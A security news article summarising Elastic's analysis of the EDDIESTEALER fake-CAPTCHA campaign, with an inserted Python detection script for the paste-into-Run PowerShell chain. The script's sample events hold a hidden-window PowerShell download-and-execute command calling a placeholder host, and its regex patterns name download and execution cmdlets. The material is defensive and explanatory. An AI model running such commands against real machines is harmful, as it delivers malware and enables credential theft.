Cybersecurity researchers have uncovered a sophisticated malware campaign leveraging deceptive CAPTCHA verification pages to distribute a newly discovered Rust-based infostealer dubbed EDDIESTEALER.
This campaign represents a significant evolution in social engineering techniques, where threat actors exploit users' familiarity with routine security verification processes to trick them into executing malicious code.
The malware employs an intricate multi-stage delivery mechanism that begins with compromised websites displaying convincing fake "I'm not a robot" verification screens, ultimately leading to the deployment of a robust data-stealing tool capable of harvesting credentials, browser data, and cryptocurrency wallet details.
The attack vector demonstrates notable sophistication in its execution methodology. Initial access occurs through compromised websites that deploy obfuscated React-based JavaScript payloads, presenting users with what appears to be a legitimate Google reCAPTCHA verification interface.
These fake verification screens instruct users to perform seemingly innocuous actions: pressing Windows Key + R to open the Run dialog, followed by Ctrl + V to paste the clipboard contents, and finally Enter to execute the command.
Unbeknownst to the victim, the malicious JavaScript has already copied a PowerShell command to their clipboard using the document.execCommand("copy") method.
Elastic Security Labs analysts identified this emerging threat through comprehensive telemetry analysis, discovering that the campaign leverages a sophisticated command structure that silently downloads secondary payloads from attacker-controlled infrastructure.
The PowerShell command automatically retrieves a JavaScript file named "gverify.js" from domains such as hxxps://1111.match/model/, which subsequently downloads the main EDDIESTEALER executable under a pseudorandomly generated 12-character filename.
This multi-layered approach effectively obscures the true nature of the attack while maintaining the appearance of a legitimate system verification process.
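The paste-into-Run chain described above leaves a recognisable process lineage: explorer.exe (the parent of the Run dialog) spawning PowerShell with download-and-execute arguments, and PowerShell in turn launching a script host for the .js loader. The following is an added detection example, not code from the article or from Elastic; the event format, the regex patterns and the sample events are all assumptions constructed for illustration.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Minimal process-creation record (assumed shape, e.g. from Sysmon Event ID 1)."""
    parent: str
    image: str
    cmdline: str


# Heuristic patterns (assumptions): cmdlets that fetch remote content, and
# flags that hide the window or evaluate downloaded text.
DOWNLOAD_PATTERN = re.compile(
    r"(invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|downloadstring|"
    r"downloadfile|start-bitstransfer|\bcurl\s|\bwget\s)", re.I)
EXEC_PATTERN = re.compile(
    r"(invoke-expression|\biex\b|-enc\w*\s|-w(indowstyle)?\s+hidden)", re.I)
POWERSHELL = ("powershell.exe", "pwsh.exe")
SCRIPT_HOST = ("wscript.exe", "cscript.exe", "mshta.exe")


def classify(ev: ProcEvent) -> list:
    """Return tags explaining why the event matches the chain (empty if benign)."""
    tags = []
    parent, image, cmd = ev.parent.lower(), ev.image.lower(), ev.cmdline
    # Stage 1: Run dialog (explorer.exe) -> PowerShell pulling a remote payload.
    if parent.endswith("explorer.exe") and image.endswith(POWERSHELL):
        if DOWNLOAD_PATTERN.search(cmd):
            tags.append("run-dialog-powershell-download")
        if EXEC_PATTERN.search(cmd):
            tags.append("run-dialog-powershell-hidden-or-iex")
    # Stage 2: PowerShell handing a fetched .js file to a script host.
    if parent.endswith(POWERSHELL) and image.endswith(SCRIPT_HOST) \
            and re.search(r"\.js\b", cmd, re.I):
        tags.append("powershell-spawned-js-loader")
    return tags


def scan(events):
    """Return (image, tags) for every event that matches at least one heuristic."""
    return [(ev.image, tags) for ev in events if (tags := classify(ev))]


# Constructed sample telemetry (not real IoCs): two chain stages and one benign event.
SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", "powershell.exe",
              'powershell -w hidden -c "iwr https://example.invalid/x -OutFile '
              '$env:TEMP\\loader.js; wscript $env:TEMP\\loader.js"'),
    ProcEvent("powershell.exe", "wscript.exe",
              "wscript.exe C:\\Users\\u\\AppData\\Local\\Temp\\loader.js"),
    ProcEvent("explorer.exe", "powershell.exe", "powershell Get-ChildItem C:\\Users"),
]
```

Tune the parent check to your telemetry source: some EDR products report the Run dialog's child under a different parent image than explorer.exe.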
Fake CAPTCHA GUI (Source – Elastic)
The malware's impact extends far beyond simple credential theft, targeting a comprehensive range of sensitive data including cryptocurrency wallets, browser-stored credentials, password manager databases, FTP client configurations, and messaging applications.
EDDIESTEALER demonstrates particular sophistication in its approach to modern browser security, implementing techniques similar to ChromeKatz to bypass the app-bound encryption protections introduced in recent Chrome versions.
EDDIESTEALER's execution chain (Source – Elastic)
The malware's ability to adapt to evolving security measures highlights the persistent threat posed by well-resourced cybercriminal organizations.
Advanced Evasion and Persistence Mechanisms
EDDIESTEALER employs multiple layers of obfuscation and evasion techniques that distinguish it from typical infostealers.
The malware makes extensive use of string encryption via XOR ciphers, with each decryption routine using a distinct key derivation function that accepts binary addresses and 4-byte constants to calculate the XOR key locations.
This approach significantly complicates static analysis, as researchers must reverse-engineer multiple custom decryption algorithms to extract meaningful artifacts.
The malware implements sophisticated API obfuscation through a custom Windows API lookup mechanism. Rather than relying on standard import tables, EDDIESTEALER dynamically resolves function addresses while maintaining a local hashtable of previously resolved API calls.
When a new function is required, the malware employs custom LoadLibrary and GetProcAddress implementations to retrieve the address, subsequently caching it for future use.
This technique effectively evades signature-based detection systems that rely on import table analysis.
EDDIESTEALER incorporates multiple anti-analysis features, including memory-based sandbox detection that evaluates total physical memory to determine whether the system meets a minimum requirement of roughly 4.0 GB.
Additionally, newer variants suggest server-side profiling capabilities, where the command and control infrastructure can assess client environments and withhold malicious payloads when sandbox or analysis systems are detected.
The malware also implements self-deletion using an NTFS Alternate Data Streams renaming technique, similar to that observed in LATRODECTUS campaigns, enabling the executable to remove itself from disk while bypassing file lock restrictions.